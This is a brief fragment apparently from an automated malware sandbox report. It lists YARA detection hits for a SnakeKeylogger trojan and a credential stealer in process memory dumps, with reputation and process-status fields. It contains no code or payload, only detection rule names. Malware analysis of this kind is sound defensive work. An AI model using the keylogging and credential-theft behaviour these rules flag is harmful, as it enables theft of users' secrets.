                                                                                    • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000007.00000002.2525234077.0000000000382000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.2527369873.0000000002766000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                    Reputation:high
                                                                                    Has exited:false
